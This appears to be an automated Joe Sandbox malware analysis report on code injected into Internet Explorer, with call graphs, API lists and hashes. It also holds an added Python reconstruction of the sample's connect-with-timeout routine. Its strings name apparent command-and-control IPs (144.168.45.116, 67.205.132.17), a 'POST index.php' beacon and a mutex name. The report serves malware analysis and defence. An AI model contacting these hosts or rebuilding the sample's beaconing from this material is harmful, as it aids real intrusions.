      control_flow_graph 0 4b4ce76-4b4cee9 call 4b4c609 3 4b4ceef-4b4cf06 call 4b4ce23 0->3 6 4b4cf5d-4b4cf64 3->6 7 4b4cf08-4b4cf1a call 4b4b277 3->7 9 4b4cf66 6->9 10 4b4cf6c-4b4cf72 6->10 17 4b4cf1c 7->17 18 4b4cf1e-4b4cf58 call 4b4b252 call 4b4a001 call 4b4a828 Sleep call 4b4aeb7 7->18 9->10 11 4b4d175-4b4d1a7 call 4b4c65a 10->11 12 4b4cf78-4b4cf80 10->12 25 4b4d1a9-4b4d1b5 call 4b58d83 11->25 26 4b4d1bb-4b4d1c7 11->26 14 4b4cfa0 12->14 15 4b4cf82-4b4cf83 12->15 22 4b4cfaa-4b4cfb1 14->22 19 4b4cf94-4b4cf9e 15->19 20 4b4cf85-4b4cf86 15->20 17->18 18->6 19->22 20->14 24 4b4cf88-4b4cf92 20->24 27 4b4d024-4b4d02b 22->27 28 4b4cfb3-4b4cfb9 22->28 24->22 25->26 35 4b4d1cd-4b4d1da 26->35 36 4b4d319-4b4d33d call 4b4b277 call 4b4afbf 26->36 30 4b4d031-4b4d039 27->30 31 4b4d14f-4b4d157 27->31 33 4b4cfbc-4b4cfc1 28->33 39 4b4d060-4b4d07a 30->39 40 4b4d03b-4b4d03c 30->40 37 4b4d162-4b4d16f 31->37 38 4b4d159-4b4d15c 31->38 33->33 42 4b4cfc3-4b4cfdc call 4b46275 33->42 45 4b4d1e2-4b4d1f2 call 4b4c62e call 4b51187 35->45 46 4b4d1dc 35->46 75 4b4d354-4b4d363 call 4b4a013 36->75 76 4b4d33f-4b4d34f Sleep call 4b4aeb7 36->76 37->11 38->12 38->37 49 4b4d07c-4b4d07d 39->49 50 4b4d0a9 39->50 47 4b4d232-4b4d24e 40->47 48 4b4d042-4b4d05e 40->48 68 4b4cfe0-4b4cffe call 4b4580f call 4b4211c 42->68 69 4b4cfde 42->69 79 4b4d1f4-4b4d1f6 call 4b4c389 45->79 80 4b4d1fb-4b4d20d call 4b4c62e call 4b5023f 45->80 46->45 47->37 56 4b4d0c8-4b4d0ce 48->56 57 4b4d09d-4b4d0a7 49->57 58 4b4d07f-4b4d080 49->58 55 4b4d0b3-4b4d0c0 50->55 64 4b4d0d4-4b4d0da 55->64 65 4b4d0c2 55->65 56->37 56->64 57->55 66 4b4d091-4b4d09b 58->66 67 4b4d082-4b4d083 58->67 73 4b4d0dd-4b4d0e2 64->73 65->56 66->55 67->50 74 4b4d085-4b4d08f 67->74 95 4b4d004-4b4d01c Sleep 68->95 96 4b4d253-4b4d25f 68->96 69->68 73->73 82 4b4d0e4-4b4d0fd call 4b46275 73->82 74->55 91 4b4d365-4b4d367 75->91 92 4b4d36d-4b4d370 75->92 76->3 79->80 111 4b4d264 80->111 112 4b4d20f-4b4d21a call 4b4c62e 80->112 101 4b4d101-4b4d11f call 4b4580f call 
4b4211c 82->101 102 4b4d0ff 82->102 91->92 97 4b4d4d5 91->97 98 4b4d372-4b4d374 92->98 99 4b4d3cb-4b4d3f7 call 4b4c62e call 4b5511d 92->99 95->27 103 4b4d01e 95->103 96->11 104 4b4d4d7-4b4d4dd Sleep 97->104 98->99 105 4b4d376-4b4d389 GetTickCount call 4b5948e 98->105 99->97 133 4b4d3fd-4b4d404 99->133 101->96 134 4b4d125-4b4d13d Sleep 101->134 102->101 103->27 109 4b4d4c6-4b4d4d0 call 4b4aeb7 104->109 123 4b4d3c3-4b4d3c9 call 4b594a0 105->123 124 4b4d38b-4b4d38c 105->124 109->3 115 4b4d26a-4b4d27c call 4b4c62e call 4b5076e 111->115 112->111 132 4b4d21c-4b4d230 call 4b4c62e TerminateThread 112->132 152 4b4d27e-4b4d289 call 4b4c62e 115->152 153 4b4d299-4b4d2a4 call 4b4c62e 115->153 146 4b4d3a8-4b4d3ab 123->146 130 4b4d38e-4b4d390 124->130 131 4b4d3bb-4b4d3c1 call 4b594a0 124->131 139 4b4d392-4b4d394 130->139 140 4b4d399-4b4d3a6 call 4b594a0 130->140 151 4b4d3ad 131->151 132->115 133->97 142 4b4d40a-4b4d414 call 4b4a019 133->142 134->31 135 4b4d13f-4b4d149 134->135 135->31 139->104 140->146 140->151 155 4b4d416-4b4d420 call 4b58dbd 142->155 156 4b4d469-4b4d4aa call 4b4a828 142->156 150 4b4d3b2-4b4d3b6 146->150 150->104 151->150 152->153 166 4b4d28b-4b4d297 call 4b4c62e TerminateThread 152->166 163 4b4d2a6-4b4d2bc call 4b4c62e call 4b51b99 call 4b4c62e TerminateThread 153->163 164 4b4d2be-4b4d2c9 call 4b4c62e 153->164 169 4b4d422-4b4d42c 155->169 170 4b4d42e 155->170 182 4b4d4ac-4b4d4be call 4b58d83 156->182 183 4b4d4bf 156->183 163->164 180 4b4d2e6-4b4d2f1 call 4b4c62e 164->180 181 4b4d2cb-4b4d2e4 call 4b4c62e call 4b50a1b call 4b4c62e TerminateThread 164->181 166->153 174 4b4d430-4b4d467 call 4b4a828 QueueUserWorkItem 169->174 170->174 174->109 193 4b4d303-4b4d314 Sleep 180->193 194 4b4d2f3-4b4d2fe call 4b4c62e call 4b55730 180->194 181->180 182->183 183->109 193->3 194->193
      APIs
        • Part of subcall function 04B4CE23: RtlEnterCriticalSection.NTDLL(?), ref: 04B4CE34
        • Part of subcall function 04B4CE23: RtlLeaveCriticalSection.NTDLL(?), ref: 04B4CE67
      • Sleep.KERNELBASE(00000005,?,00000017,00000000,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4CF4C
      • Sleep.KERNEL32(00001388,00000001,00000000), ref: 04B4D009
      • Sleep.KERNEL32(000001F4,00000001,00000000), ref: 04B4D12A
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D22E
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D297
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D2BC
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D2E4
      • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 04B4D308
      • Sleep.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 04B4D341
      • GetTickCount.KERNEL32 ref: 04B4D376
      • QueueUserWorkItem.KERNEL32(04B4C9C3,00000000,00000000,00000010,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 04B4D45B
      • Sleep.KERNEL32(00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 04B4D4D7
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Sleep$TerminateThread$CriticalSection$CountEnterItemLeaveQueueTickUserWork
      • String ID: 144.168.45.116$67.205.132.17$67.205.132.17
      • API String ID: 1028147-1276932278
      • Opcode ID: 84eb4837bb81f77136d8fa4897200cf883bd7cf91c6482f36ee9b7f37cd739fc
      • Instruction ID: b55304e879a66d6c07351d6bc898d5b37004e016864867798aa70c0eb228bf0e
      • Opcode Fuzzy Hash: 84eb4837bb81f77136d8fa4897200cf883bd7cf91c6482f36ee9b7f37cd739fc
      • Instruction Fuzzy Hash: 60025171901319DFEF24AF64DC94BA9B7B9FB84305F0041EAD509A7250DB34BA84EF21
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      • Control-flow graph (rendered graph not reproduced): function at 04B498BB, basic blocks 04B498BB-04B49FFE, epilogue via call to 04B58E89. API calls inside the graph: GetLastError (block 04B499C1), RevertToSelf (block 04B49A0E), lstrcpyW (blocks 04B49BE5 and 04B49C15), lstrcatW (block 04B49BE5).
      APIs
      • GetLastError.KERNEL32(?,?,00000000), ref: 04B499C1
      • RevertToSelf.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B49A0E
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ErrorLastRevertSelf
      • String ID: <$POST$index.php
      • API String ID: 3253228863-4060378329
      • Opcode ID: a574be9b3d2e2dfe01c2986f4d163e1b746428da324ff3577357bf1b11026ab0
      • Instruction ID: ca6083e7db5c9bd9cdfdf87649b619e72eaf4b8a185d1fa6c3efc17ba27fca7a
      • Opcode Fuzzy Hash: a574be9b3d2e2dfe01c2986f4d163e1b746428da324ff3577357bf1b11026ab0
      • Instruction Fuzzy Hash: AE1253B1500258AFEB249F74CD84BEBB7B9EB85704F0048EAE54AA7150DB747E84DF21
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      • Control-flow graph (rendered graph not reproduced): function at 04B43909, basic blocks 04B43909-04B43A44. Call order in the graph: htons, ioctlsocket, connect (block 04B4392B); WSAGetLastError (04B43986); select (04B43997); getsockopt (04B439D6). Every error and timeout path converges on the final ioctlsocket block (04B43A1D) before the epilogue call to 04B58E89.
      APIs
      • htons.WS2_32(?), ref: 04B4393D
      • ioctlsocket.WS2_32(?,8004667E,?), ref: 04B43966
      • connect.WS2_32(?,?,00000010), ref: 04B43977
      • WSAGetLastError.WS2_32(?,?,00000010,?,8004667E,?), ref: 04B43986
      • select.WS2_32(?,00000000,?,00000000,?), ref: 04B439CC
      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,?), ref: 04B43A01
      • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 04B43A2E
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ioctlsocket$ErrorLastconnectgetsockopthtonsselect
      • String ID:
      • API String ID: 2491164242-0
      • Opcode ID: bdbe215ee9f7e0832992d1e07193028deaca0fe55238c05a4b043cb42e0884f9
      • Instruction ID: a4f13bb8ee5a3d686c34ac3c4446b1687e73e59e2b16e2a300635da873c5d90c
      • Opcode Fuzzy Hash: bdbe215ee9f7e0832992d1e07193028deaca0fe55238c05a4b043cb42e0884f9
      • Instruction Fuzzy Hash: 7B311B7191011CAFEB20DF64CC45BEDB7F8EF48315F1046AAE588E2280D7745E959FA1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • Sleep.KERNELBASE(00001388), ref: 04B575CA
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 04B57618
      • setsockopt.WS2_32(00000000,0000FFFF,00001006,00004E20,00000004), ref: 04B5762E
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000001), ref: 04B57646
        • Part of subcall function 04B43AE9: shutdown.WS2_32(00000000,00000002), ref: 04B43AFC
        • Part of subcall function 04B43AE9: closesocket.WS2_32(?), ref: 04B43B04
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: setsockopt$Sleepclosesocketshutdown
      • String ID: N
      • API String ID: 4173770719-1161386698
      • Opcode ID: eb1ae805b0b96d2537f7c22d53746305aa9c000266659a6e27a92b82c460060c
      • Instruction ID: a2238251ad6dccc88cced9fd6eb9cc7762e0bdebc416d4270865bd5b3ae14533
      • Opcode Fuzzy Hash: eb1ae805b0b96d2537f7c22d53746305aa9c000266659a6e27a92b82c460060c
      • Instruction Fuzzy Hash: 761196B1B4030476FB10A6A59C85FBEBBADDB84314F080096FE01E71D0DEB9A9059771
      Uniqueness

      Uniqueness Score: -1.00%
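
The seven calls of the function at 04B43909 and the setsockopt sequence that follows it are the standard Winsock non-blocking-connect-with-timeout idiom: FIONBIO on, connect, wait on select, read SO_ERROR, FIONBIO off, then set the send/receive timeouts and TCP_NODELAY on the connected socket. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox; it reproduces that control flow with the POSIX socket API so the two outcomes (live port, closed port) can be checked on loopback. The host, the loopback ports and the 2-second deadline are choices for the demo; the 20000 ms timeout mirrors the 0x4E20 in the listing.

```python
import errno
import select
import socket

# Raw values as printed in the listing: ioctlsocket cmd 8004667E = FIONBIO,
# getsockopt level 0000FFFF = SOL_SOCKET, option 00001007 = SO_ERROR,
# setsockopt options 00001005/00001006 = SO_RCVTIMEO/SO_SNDTIMEO, level 6/opt 1 = TCP_NODELAY.


def connect_with_timeout(host, port, timeout=5.0):
    """Non-blocking connect with a select() deadline.  Returns a connected socket
    switched back to blocking mode, or None on timeout/refusal, the same shape as
    the sample's helper: FIONBIO on, connect, error check, select, SO_ERROR, FIONBIO off."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setblocking(False)                                   # ioctlsocket(s, FIONBIO, 1)
    err = s.connect_ex((host, port))                       # connect(); in-progress is normal
    if err not in (0, errno.EINPROGRESS, errno.EWOULDBLOCK):  # Windows: WSAEWOULDBLOCK
        s.close()
        return None
    if err != 0:
        _, writable, _ = select.select([], [s], [], timeout)  # select(0, NULL, &wfds, NULL, &tv)
        if not writable:                                   # deadline passed, no SYN-ACK
            s.close()
            return None
        if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) != 0:  # refused/unreachable
            s.close()
            return None
    s.setblocking(True)                                    # ioctlsocket(s, FIONBIO, 0)
    return s


def tune_like_sample(s, timeout_s=20.0):
    """Options the sample sets right after connecting: SO_RCVTIMEO/SO_SNDTIMEO
    (0x4E20 = 20000 ms) and TCP_NODELAY.  settimeout() is the portable stand-in
    for the two timeout setsockopt calls."""
    s.settimeout(timeout_s)
    s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    return s


def local_demo():
    """Exercise both outcomes on 127.0.0.1: a live listener and a closed port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    conn = connect_with_timeout("127.0.0.1", open_port, timeout=2.0)
    connected = conn is not None
    nodelay = False
    if connected:
        nodelay = bool(tune_like_sample(conn).getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
        conn.close()
    listener.close()

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))       # reserve a port number without ever listening on it
    closed_port = probe.getsockname()[1]
    probe.close()
    refused = connect_with_timeout("127.0.0.1", closed_port, timeout=2.0) is None
    return connected, nodelay, refused


if __name__ == "__main__":
    print(local_demo())   # expected (True, True, True)
```

On Windows the in-progress code is WSAEWOULDBLOCK (10035) rather than EINPROGRESS, which is why the sample reads WSAGetLastError (04B43986) between connect and select in the graph above; the timeout branch and the SO_ERROR branch both fall through to the second ioctlsocket, so the socket is always returned to blocking mode before the caller sees it.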

      Control-flow Graph

      APIs
      • CreateMutexW.KERNELBASE(00000000,00000000,vv11287GD), ref: 04B519C6
      • GetLastError.KERNEL32 ref: 04B519CC
        • Part of subcall function 04B4D673: GetTickCount.KERNEL32 ref: 04B4D6B8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CountCreateErrorLastMutexTick
      • String ID: vv11287GD
      • API String ID: 2324081774-3480148222
      • Opcode ID: 782e150fac59931ccc3012469fdb6651b4f41bae6241f6faa1f32f8549aedb09
      • Instruction ID: b4ab46df8a7d18e618562f069a554221e810498e7cceb5a48230ddf76db3357f
      • Opcode Fuzzy Hash: 782e150fac59931ccc3012469fdb6651b4f41bae6241f6faa1f32f8549aedb09
      • Instruction Fuzzy Hash: E621D570E0121496FB10BFB9CC05BAE76B9EF55708F0005A5DD02E7190EA78B901D765
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 04B5EAE9: TlsGetValue.KERNEL32(?,04B5EC42,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EAF2
        • Part of subcall function 04B5EAE9: RtlDecodePointer.NTDLL ref: 04B5EB04
        • Part of subcall function 04B5EAE9: TlsSetValue.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB13
        • Part of subcall function 04B5EAC9: TlsGetValue.KERNEL32(?,?,04B5B90D,00000000), ref: 04B5EAD7
        • Part of subcall function 04B5EB1D: RtlDecodePointer.NTDLL(?), ref: 04B5EB2E
      • GetLastError.KERNEL32(00000000,?,00000000), ref: 04B5B924
      • RtlExitUserThread.NTDLL(00000000), ref: 04B5B92B
      • GetCurrentThreadId.KERNEL32 ref: 04B5B931
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser
      • String ID:
      • API String ID: 1656690970-0
      • Opcode ID: a544c02e5879c21b2852743e952181752ff3dc00b089ce911b919315fffaa832
      • Instruction ID: 5b75d0eda32da382fa27153b3e0f155bd03a53095f4a74ea47773b7e10048a56
      • Opcode Fuzzy Hash: a544c02e5879c21b2852743e952181752ff3dc00b089ce911b919315fffaa832
      • Instruction Fuzzy Hash: F5F09670104605ABE704BFB5C548A5EFBA9EF4820871085D4FD49D7232DB34FA438BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 04B5EAE9: TlsGetValue.KERNEL32(?,04B5EC42,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EAF2
        • Part of subcall function 04B5EAE9: RtlDecodePointer.NTDLL ref: 04B5EB04
        • Part of subcall function 04B5EAE9: TlsSetValue.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB13
        • Part of subcall function 04B5EAC9: TlsGetValue.KERNEL32(?,?,04B5B90D,00000000), ref: 04B5EAD7
        • Part of subcall function 04B5EB1D: RtlDecodePointer.NTDLL(?), ref: 04B5EB2E
      • GetLastError.KERNEL32(00000000,?,00000000), ref: 04B5B924
      • RtlExitUserThread.NTDLL(00000000), ref: 04B5B92B
      • GetCurrentThreadId.KERNEL32 ref: 04B5B931
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser
      • String ID:
      • API String ID: 1656690970-0
      • Opcode ID: 4b0205b279c9025a92bcd4cb5345513087d6cb7f084dc86069e1a557eb88db48
      • Instruction ID: 890c1370535747e229aa53fab6e700a7968d37bae672ac5589ca08ed078de6f7
      • Opcode Fuzzy Hash: 4b0205b279c9025a92bcd4cb5345513087d6cb7f084dc86069e1a557eb88db48
      • Instruction Fuzzy Hash: A0E06D7180460A67EF003FF5D808B9FFA68EE04248B1404D0FE52E3631EB28FA0286B1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      • Control-flow graph (rendered graph not reproduced): function at 04B46BB0, basic blocks 04B46BB0-04B46E0D, prologue call to 04B592AF and epilogue call to 04B5931E. Three GlobalFree calls sit on the exit path (blocks 04B46DD8, 04B46DE9, 04B46DFA), each reached conditionally.
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: FreeGlobal
      • String ID:
      • API String ID: 2979337801-0
      • Opcode ID: d3758c2d438080c64112dcbfde761eecfa8a57c19346057e046d23f132202204
      • Instruction ID: 338812ca9a864de2204b0eee776b73f5a60fe166078dc694f97c3fa26fb8e1a5
      • Opcode Fuzzy Hash: d3758c2d438080c64112dcbfde761eecfa8a57c19346057e046d23f132202204
      • Instruction Fuzzy Hash: 6A613B71900B05EFEB20DF74C848BEBB7E4FB85304F00496DE96A96290D775BA44DB61
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 04B486E1
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: FolderPathSpecial
      • String ID: config\systemprofile
      • API String ID: 994120019-3661184424
      • Opcode ID: 84445c4683ea33e60523340542a0a36597b32d280234cce67c3ade823d012c2f
      • Instruction ID: 74d2eb05e456d7f342bac0c888074486bbd08800bf5cab109b5ba725d55f5867
      • Opcode Fuzzy Hash: 84445c4683ea33e60523340542a0a36597b32d280234cce67c3ade823d012c2f
      • Instruction Fuzzy Hash: 1D218171901228AADF20FFA5DC49BEEB7B8EF59714F0001D5E509A2190EB70AB85DF51
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      • Control-flow graph (rendered graph not reproduced): function at 04B5B95C, basic blocks 04B5B95C-04B5B9FB. CreateThread in block 04B5B9C1; the failure branch (04B5B9DB) calls GetLastError before joining the common exit.
      APIs
      • CreateThread.KERNELBASE(?,?,04B5B8F7,00000000,?,?), ref: 04B5B9D1
      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 04B5B9DB
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateErrorLastThread
      • String ID:
      • API String ID: 1689873465-0
      • Opcode ID: ac4a25aa64c3d824226ff1f99899227721bfc04d5bb1a02e2fdda1c0e375fa58
      • Instruction ID: 3551cbeb0d4a4905575b6ca186e1878c62cabb25e607f0cb31128fddd2d0e8a0
      • Opcode Fuzzy Hash: ac4a25aa64c3d824226ff1f99899227721bfc04d5bb1a02e2fdda1c0e375fa58
      • Instruction Fuzzy Hash: C51129321087466FBB11AFA5DC40FABB7A8EF04778B1001A9FC1487571DB31F81186A0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 04B593FA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 04B5943F
      • Sleep.KERNEL32 ref: 04B4F8D8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeapSleep
      • String ID: POST
      • API String ID: 4201116106-1814004025
      • Opcode ID: 3d1965d57f9c049a7e6074f1de92bf5bfeabd805dfe8baab277106af563af179
      • Instruction ID: aaa84ad12012df9b240c054a1ef2a9e0e8179793de3ddf420c88ce91d5c756f1
      • Opcode Fuzzy Hash: 3d1965d57f9c049a7e6074f1de92bf5bfeabd805dfe8baab277106af563af179
      • Instruction Fuzzy Hash: 2E01A779600305EBEB10AFA8DC80A6B7BA9EF853287044869FD5547311DE75FC10EB60
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      • Control-flow graph (rendered graph not reproduced): function at 04B51AF8, basic blocks 04B51AF8-04B51B49. CoInitialize in the entry block; its result selects whether 04B51ACC is called before the epilogue call to 04B58E89.
      APIs
      • CoInitialize.OLE32(00000000), ref: 04B51B10
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Initialize
      • String ID: ^As
      • API String ID: 2538663250-2235299175
      • Opcode ID: 717f8f8dca54a1ea160994b5ce9aa11aed461e2dd69232961f4cda8750b462cb
      • Instruction ID: 7866e7ac9fda5a8d1192819cec9e4f6d2ca1620122b5a88594a82d78851f360f
      • Opcode Fuzzy Hash: 717f8f8dca54a1ea160994b5ce9aa11aed461e2dd69232961f4cda8750b462cb
      • Instruction Fuzzy Hash: C4F03775B00109AF9B01EF7DD944AAFB7BDEB84615715049AEC05D3240DB34AE068B75
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      • Control-flow graph (rendered graph not reproduced): function at 04B51943, basic blocks 04B51943-04B5199A. WSAStartup in the entry block; WSACleanup (block 04B51987) is reached only on the branch where the post-startup checks fail, then all paths join the epilogue call to 04B58E89.
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CleanupStartup
      • String ID:
      • API String ID: 915672949-0
      • Opcode ID: c5414d2b67bbcfc2d3d7f8b5f5fa352565b1623e984883c27abec891423ec1e6
      • Instruction ID: 1fc8fb45d8e74130a4fb9bb5e3623f6e69b600df1cf563bedaf185138bf4b2a4
      • Opcode Fuzzy Hash: c5414d2b67bbcfc2d3d7f8b5f5fa352565b1623e984883c27abec891423ec1e6
      • Instruction Fuzzy Hash: 98F03070E10148ABEF60EF7C9919BA9F7F8DB19304F4004E6994AD6155E534A9478E21
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B5BE64,?,?,?,?,?,?,04B76C78,0000000C,04B5BF0C), ref: 04B51A9D
      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04B51ABE
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventObjectSingleWait
      • String ID:
      • API String ID: 2678385144-0
      • Opcode ID: 35137fb1e2a7aff2af816c1479c01722084d12008606dbeb29deef6c48d4ce14
      • Instruction ID: 93ba1d6b9dfb3ff5dfa0337c6ee57c25c0e58d0d571d887fa96161573419dedb
      • Opcode Fuzzy Hash: 35137fb1e2a7aff2af816c1479c01722084d12008606dbeb29deef6c48d4ce14
      • Instruction Fuzzy Hash: 39E0123291B13176D630567B1C4DFDB5D9CCF576F07050655F81DD11D1D5545812C5F0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • shutdown.WS2_32(00000000,00000002), ref: 04B43AFC
      • closesocket.WS2_32(?), ref: 04B43B04
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: closesocketshutdown
      • String ID:
      • API String ID: 572888783-0
      • Opcode ID: b50f504f29824ecf5d347c8d5effcd8aaa0c375f6adc5d06d37c855767441082
      • Instruction ID: 2eb3d7eb4e7e0f451a031da8d2570c6325eab7324ccfe74955eb377f3f14824b
      • Opcode Fuzzy Hash: b50f504f29824ecf5d347c8d5effcd8aaa0c375f6adc5d06d37c855767441082
      • Instruction Fuzzy Hash: 3FD01C30200210ABE7240B2CA84AB807AE4EB00730F294B9AE0F1A22E0C7749881CA60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 04B5943F
        • Part of subcall function 04B5F19C: GetModuleFileNameW.KERNEL32(00000000,04B9D222,00000104,00000001,00000000,00000000), ref: 04B5F238
        • Part of subcall function 04B5B5E6: ExitProcess.KERNEL32 ref: 04B5B5F7
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AllocateExitFileHeapModuleNameProcess
      • String ID:
      • API String ID: 1715456479-0
      • Opcode ID: fdfc14c4d668d62d54afa6d8f8228686440c9709866ed924660886e48608d666
